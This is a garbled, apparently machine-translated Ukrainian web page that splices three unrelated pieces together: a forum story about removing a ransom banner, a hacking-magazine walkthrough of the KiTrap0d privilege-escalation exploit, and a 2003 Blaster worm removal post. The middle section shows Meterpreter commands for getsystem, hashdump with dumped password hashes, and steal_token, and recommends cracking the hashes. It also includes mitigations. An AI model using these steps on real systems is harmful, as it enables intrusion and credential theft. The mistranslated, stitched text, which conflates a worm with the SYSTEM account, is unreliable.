Доступ до папки мережі під NT AUTHORITY\NetworkService. Увага!!! Nt Authority\system - це черв'як! Як це працює
Нещодавно, точніше тиждень тому хапнув черв'яка, причому зроду такого не було за все моє чайництво! Час ніч - майстра не викличеш, та й гроші тільки на картці - в кормані рублів 200. Що робити, комп'ютер потрібен до зарізу!
Через телефон лізу в пошукові системи і забиваю написану в заголовку теми назву - мамо моя, що я дізнаюся - ця тварюка живе в інеті з 1993 року, причому корпорація microsoft знає про неї, творець поінформував їх спеціально. На сьогоднішній день цей черв'як потрапляючи у ваш комп набуває прав адміна і здатний витворяти будь-які фокуси.
Дослідивши кілька десятків форумів, перечитавши за добу сотні порад я не знаючи сну лізу в надра своєї системи і тремтячими руками починаю відкривати папки та файли, про які прочитав. Знову через телефон я лізу до нас на сайт і пишу одному з наших модераторів... Проблема дуже каверзна і щоб не мучити мене людина радить знести систему та встановити нову, але я ніколи самостійно цього не робив! Він розповідає мені телефоном (не шкодуючи грошей на міжміські переговори) як крок за кроком це зробити, а я сиджу і записую. Після цього він чекає на результат, а я сиджу і розумію, що мені дуже шкода накопиченої інформації... і я приймаю рішення, якщо зносити - встигну завжди, а зараз поборюся своїми силами.
У будь-якому разі я знав, що зі мною поряд наші гуру і вони порадять, що зробити і як. Поки що на свій страх і ризик я роблю таке:
1) Банер відключає комп'ютер на перезавантаження через 60 секунд - значить треба цей час збільшити і я за порадою одного форумчанина встигаю перевести годинник на рік тому!
2) вже спокійно і не поспішаючи переглядаю весь реєстр та програми через AnvirTaskManager - він єдиний питав про появу нової програмиале я як лох дозволив пропустити.
3) нічого не зрозумівши там, я запускаю повне сканування AVAST, попередньо встановивши в налаштуваннях всі розширення.
через 3,5 години він видав мені 6 заражених файлів – ось вони
win32 malware-gen(2 штуки)
Fakeinst-T (2шт)
Цих шкідників просто видаляю, навіть не намагаючись лікувати.
4) Потім йду в Revo Unystailer і видаляю все, що встановлював за останні кілька днів, разом з AnvirTaskManager і Reg Organizier.
5) Завантажую AVZ і запускаю.
І тут виникає проблема - у мене диск розділений на два С і Н. С сканується нормально і нічого не знаходить, тільки починає сканувати Н весь комп'ютер впадає в ступор. Перезавантажую- банер вже не вискакує і я заспокоююся, інет працює, але не відкривається мозила, йду через гуглхром.
Перевіряю Н в режимі on-line. Чисто! Відкриваю Н, намагаюся виділити папку – знову комп зависає намертво! Після кількох спроб відкрити, сканую ще раз AVASTом і не знайшовши нічого вирішую – копіювати все на С.
Після копіювання на С очищаю весь Н і лізу в копію - все працює!
Годину тому скачав і оновив Мозилу тепер Радію життя. Перевірив все і тепер оновлю доктора W curellt і поставлю на ніч – вже для заспокоєння совісті! Тож майте на увазі дорогі колеги – не все так страшно. Для безпеки ваших комп'ютерів зробіть як зазначено в прикріпленому файлі!
Хай буде здоров'я у наших PCюків!
З повагою до всіх читачів Олексію!
Буквально за кілька днів перед здаванням номера до друку Metasploit обзавівся
Новим модулем, про який ми просто не могли не розповісти. Завдяки
нову команду getsystem, на скомпрометованій системі стало можливо перейти
з User Level у ring0, отримавши права NT AUTHORITY\SYSTEM! І це - у будь-яких
версіях вінди.
19 січня 2010 року стала публічною 0-day вразливість, що дозволяє виконати
підвищення привілеїв у будь-якій версії Windows, починаючи від NT 3.1, випущеної ще
1993 року, і закінчуючи новомодною "сімкою". На exploit-db.com хакером Tavis
Ormandy були опубліковані як вихідники сплоїта KiTrap0d, так і скомпільований
бінарник, готовий до застосування. Опробувати оригінальний сплоїт може будь-який
бажаючий. Для цього потрібно лише витягти з архіву vdmexploit.dll та vdmallowed.exe,
якимось чином передати на машину-жертву, і там запустити exe-шник. У
результаті, незалежно від того, під обліковим записом якого користувача виконано
запуск, з'явиться консоль із привілеями системного користувача, тобто NT
AUTHORITY\SYSTEM. Заради перевірки можна запустити сплоіт на своїй машині,
попередньо залогінившись у систему під звичайним користувачем. Після запуску
сплоїта відкриється нове вікно cmd.exe з максимальними привілеями.
Що дає? Уяви ситуацію, що сплоїть пробиває деякий додаток і
отримує шелл на віддаленому комп'ютері. Нехай це буде згуртуватися для Internet
Explorer - у цьому випадку у зломщика на руках буде доступ до системи з правами
того користувача, під обліком якого було запущено браузер. Не сперечаюся, дуже
часто це буде обліковий запис з правами адміністратора (користувач сам винен), але
якщо ні? Ось тут і можна заюзати KiTrap0d, щоб підняти свої привілеї
до NT AUTHORITY\SYSTEM! Мало того, навіть ті користувачі, які входять до групи
адміністратора, не можуть звертатися до деяких ділянок системи, наприклад,
читання хешей паролів користувачів (про це нижче). А NT системний акаунт -
може! При цьому, на момент публікації статті жодного патча з боку
Microsoft, що закриває вразливість, не було випущено.
Операція "Захоплення системи"
Демонструвати в дії оригінальний згуртувати ми не будемо, тому що 25
січня Metasploit був доданий новий скрипт, завдяки якому використовувати
KiTrap0d стало ще зручніше. Варіант, що спочатку потрапив до бази модулів
нестабільний і спрацьовував не завжди, але не минуло й півдня, як усі помилки були
усунуті. Зараз модуль закачується разом з усіма іншими оновленнями,
так що для встановлення достатньо вибрати пункт меню "Metasploit update".
Тепер, маючи доступ до віддаленої системи, можна набрати "run kitrap0d" та навести
згуртує в дію. "Але раз пішла така п'янка, реалізуємо ми для цієї справи
спеціальну команду", - подумали розробники Metasploit. У результаті
вийшла чудова така команда "підвищити привілеї", доступна через
розширення meterpreter - нам вона дуже подобається:).
Отже, ми маємо доступ до віддаленої системи (наочний приклад
експлуатування наведено у статті "Операція "Аврора") і ми знаходимося в консолі
метасплоїту. Подивимося, як у нас справи з правами:
meterpreter > getuid
Ага, звичайний користувач. Можливо, він навіть входить до групи
адміністраторів, але нам це не важливо. Підключаємо модуль, в якому реалізовано
цікава для нас команда getsystem, і перевіримо, чи поринула вона, відобразивши на
екрані довідку:
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem
Примітка, щоб вивести свою привілею, що з місцевої системи.
OPTIONS:
H Help Banner.
-t Технологія використання. (Default to "0").
0: All techniques available
1: Service - Named Pipe Impersonation (In Memory/Admin)
2: Service - Named Pipe Impersonation (Dropper/Admin)
3: Service - Token Duplication (In Memory/Admin)
4: Exploit - KiTrap0D (In Memory/User)
Як видно, сплоїти KiTrap0D реалізує лише частину функціональності команди.
Якщо тобі вдалося відхопити шелл із користувачем, у якого вже є права
адміністратора, то для підняття рівня NT AUTHORITY\SYSTEM можна використовувати
три інші техніки (вибрати потрібну дозволяє ключ -t). Так чи інакше, не вказавши
взагалі ніяких параметрів ми вкажемо метасплоїту, що той може використовувати
будь-який із підходів. У тому числі і KiTrap0D, що підвищить наші привілеї до рівня
"Система", хоч би якими правами ми зараз мали.
meterpreter > getsystem
...got system (via technique 4).
Ага, отримали повідомлення про успішне підвищення привілеїв, причому для атаки
використовувався саме KiTrap0D – мабуть, у нього пріоритет. Чи ми дійсно
піднялися у системі? Перевіримо наш поточний UID (ідентифікатор користувача):
meterpreter > getuid
Є! Усього одна команда в консолі метасплоїта та права NT AUTHORITY\SYSTEM у
нас у кишені. Далі, загалом кажучи, можна все. При цьому нагадаю, жодного
патчу від Microsoft на момент виходу журналу ще не було.
Дампім паролі
Якщо вже на руках є доступ до системного облікового запису, то треба витягти з цього
щось корисне. В арсеналі Metasploit є чудова команда hashdump -
більш просунута версія відомої утиліти pwdump. Більше того, в останній
версії метасплоїту включено перероблений варіант скрипту, який використовує
модернізований принцип вилучення LANMAN/NTLM хешей і доки не детектується
антивірусами. Але сенс не в цьому. Важливо, що для виконання команди hashdump
необхідні права NT AUTHORITY\SYSTEM. Інакше програма видасть помилку
"[-] priv_passwd_get_sam_hashes: Operation failed: 87". Відбувається це тому,
що LANMAN/NTLM-хеші паролів користувачів зберігає у спеціальних гілках реєстру
HKEY_LOCAL_MACHINE\SAM та HKEY_LOCAL_MACHINE\SECURITY, які недоступні навіть
адміністраторам. Їх можна прочитати лише з привілеями системного облікового запису.
Взагалі кажучи, використовувати сплоїть і потім команду hashdump для того, щоб
локально витягти з реєстру хешу, зовсім необов'язково. Але якщо така
можливість їсти, чому б і ні?
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 3ed7[...]
[*] Отримавши user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:...
Guest:501:aad3b435b51404eeaad3b435b51404ee:...
HelpAssistant:1000:ce909bd50f46021bf4aa40680422f646:...
Хеші отримані. Залишається згодувати їх якомусь із брутфорсерів, наприклад,
l0phtcrack.
Як повернути привілеї?
Смішна ситуація сталася, коли я спробував повернути права звичайного
користувача назад. Знайдена команда rev2self не спрацьовувала, і я як і раніше
залишався "NT AUTHORITY\SYSTEM": мабуть, вона призначена для роботи з трьома
іншими підходами, реалізованими в getsystem. Виявилося, щоб повернути
привілеї, необхідно "вкрасти" токен процесу, запущеного тим користувачем,
який нам потрібний. Тому відображаємо всі процеси командою ps та вибираємо з них
підходящий:
meterpreter > ps
Process list
============
PID Name Arch User Path
--- ---- ---- ---- ----
0
4 System x86 NT AUTHORITY\SYSTEM
370 smss.exe x86 NT AUTHORITY\SYSTEM\SystemRoot\System32\smss.exe
...
1558 explorer.exe x86 WINXPSP3\user C:\WINDOWS\Explorer.EXE
...
Як ми бачимо, explorer.exe запущений якраз під звичайним користувачам
акаунтом і має PID=1560. Тепер, власне, можна і "украсти токен", заюзавши
команду steal_token. Як єдиний параметр їй передається PID
необхідного процесу:
meterpreter > steal_token 1558
Stolen token with username: WINXPSP3\user
meterpreter > getuid
Server username: WINXPSP3\user
Судячи з поля "Server username", операція виконалася успішно.
Як це працює?
Насамкінець варто розповісти про природу вразливості, що призвела до появи
сплоїти. Пролом у захисті виникає з вини помилки в обробнику системного
переривання #GP (який називається nt!KiTrap). Через неї з привілеями ядра
може бути виконаний довільний код. Це відбувається тому, що система
неправильно перевіряє деякі виклики BIOS"а, коли на 32-бітовій x86-платформі
виконується 16-бітна програма. Для експлуатації вразливості сплоїт створює
16-бітний додаток (%windir% \twunk_16.exe), маніпулює з деякими
системними структурами та викликає функцію NtVdmControl(), щоб стартувати
Windows Virtual DOS Machine (aka підсистема NTVDM), що в результаті попередніх
маніпуляцій призводить до виклику обробника системного переривання #GP та
спрацьовування сплоїта. До речі, звідси випливає і єдине обмеження
сплоїта, який спрацьовує лише на 32-бітових системах. У 64-бітних
операційних банально немає емулятора для запуску 16-бітних додатків.
Чому інформація з готовим сплоїтом потрапила до публічного доступу? Про наявність
вразливості автор сплоїта інформував Microsoft ще на початку минулого року і
навіть отримав підтвердження, що його звіт було ухвалено до розгляду. Тільки віз
і нині там. За рік офіційного патчу від компанії не було, і автор вирішив
опублікувати інформацію публічно, сподіваючись, що справа піде швидше. Подивимося,
чи вийде латка до моменту появи журналу у продажу:)?
Як убезпечити себе від сплоїту
Оскільки повноцінного оновлення для вирішення вразливості поки що немає,
доведеться скористатися обхідними шляхами. Найнадійніший варіант -
відключити MSDOS і WOWEXEC підсистеми, що відразу позбавить сплоїт
функціональність, т.к. він більше не зможе викликати функцію NtVdmControl()
для запуску системи NTVDM. У старих версіях Windows це реалізується через
реєстр, в якому потрібно знайти гілку HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WOW
і додати якийсь символ до її назви. Для сучасних ОС
встановлювати обмеження на запуск 16-бітових додатків треба через
групові політики. Для цього викликаємо GPEDIT.MSC, далі переходимо до розділу
"Конфігурація користувача/Адміністративні шаблони/Компоненти Windows/Сумісність
додатків" та активуємо опцію "Заборона доступу до 16-розрядних
додатків".
WWW
Опис уразливості від автора сплоїта:
http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html
Тимчасове рішення для усунення проблеми від Microsoft:
http://support.microsoft.com/kb/979682
WARNING
Інформація представлена в освітніх цілях. Використання її в
протизаконних цілях може спричинити кримінальну відповідальність.
NT AUTHORITY/SYSTEM ERROR,
повідомлення XP - як видалити вірус
Якщо у Вас російська версія - перш ніж качати обов'язково змініть мову.
Трохи про сам вірус:
Вчорашнього вечора, приблизно після 23 години по Москві, у багатьох форумах почали з'являтися повідомлення про дивну поведінку Windows 2000 і Windows XP при заході в Мережу: система видала повідомлення про помилку сервісу RPC та необхідність перезавантаження. Після перезавантаження повідомлення повторювалося максимум через кілька хвилин, і не було кінця.
Проведене розслідування показало, що виною всьому епідемія нового мережевого черв'яка, що почалася сьогодні w32.Blaster.worm.Червь експлуатує знайдену 16 липня вразливість у сервісі RPC DCOM, присутню у всіх операційні системисімейств Windows 2000, Windows XP і Windows 2003. Ця вразливість - переповнення буфера, яке викликається відповідним чином складеним TCP/IP пакетом, що прийшов на порт 135, 139 або 445 комп'ютера, що атакується. Вона дозволяє як мінімум провести DoS-атаку (DoS означає "Denial of Service", або "відмова в обслуговуванні", в даному випадку - комп'ютер, що атакується, перезавантажується), а як максимум - виконати в пам'яті атакованого комп'ютера будь-який код.
Перше, що викликало занепокоєння мережевої громадськості ще до появи черв'яка - це наявність дуже простого у використанні експлоїту (програми для використання вразливості), що зазвичай призводить до ситуації, коли будь-хто може взяти цю програму і почати їй користуватися аж ніяк не в мирних цілях. Однак це були квіточки.
Новий черв'як при своєму поширенні проводить атаку на 135-й порт, і, у разі успіху, запускає програму TFTP.exe, за допомогою якої завантажує на свій комп'ютер свій виконуваний файл. При цьому користувачеві видається повідомлення про зупинення сервісу RPC та подальше перезавантаження. Після перезавантаження черв'як автоматично запускається і починає сканувати доступні з комп'ютера мережі на комп'ютери з відкритим 135-м портом. При виявленні таких черв'як проводить атаку, і повторюється спочатку. Причому, судячи з темпів поширення на Наразі, Незабаром черв'як вийде на перше місце в списках антивірусних компаній.
Існують три способи захисту від хробака.
По-перше, у бюлетені Microsoft наведено посилання на патчі для всіх вразливих версій Windows, що закривають пролом в RPC (ці патчі були випущені ще 16 липня, тому тим, хто регулярно оновлює систему, турбуватися не варто).
По-друге, якщо 135-й порт закритий файрволлом - хробак не зможе проникнути на комп'ютер.
По-третє, як крайній мірі допомагає відключення DCOM (докладно цю процедуру описано в бюлетені від Microsoft). Таким чином, якщо ви ще не зазнали атаки черв'яка - настійно рекомендується якнайшвидше завантажити патч для вашої ОС з сервера Microsoft (наприклад, скористайтеся службами Windows Update), або налаштувати блокування портів 135, 139 та 445 у файрволлі.
Якщо ваш комп'ютер вже заражений (а поява повідомлення про помилку RPC однозначно означає, що він заражений), то необхідно вимкнути DCOM (інакше кожна наступна атака буде викликати перезавантаження), після чого завантажити і встановити патч.
Для знищення черв'яка необхідно видалити з ключа реєстру HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr
entVersion\Run запис "windows auto update"="msblast.exe", після чого знайти та стерти файл msblast.exe - це і є тіло хробака. Більш детально про процедуру видалення хробака можна прочитати на сайті Symantec.
На даний момент не всі антивіруси виявляють черв'яка – сподіватися на захист з їхнього боку можна буде лише після виходу оновлень.
Вміщено AHTOH 17-08-2003 о 23:29:
НЕБЕЗПЕЧНИЙ ЧЕРВЬ! Nt Authority / System Error
__________________
Приношу добро, наношу користь...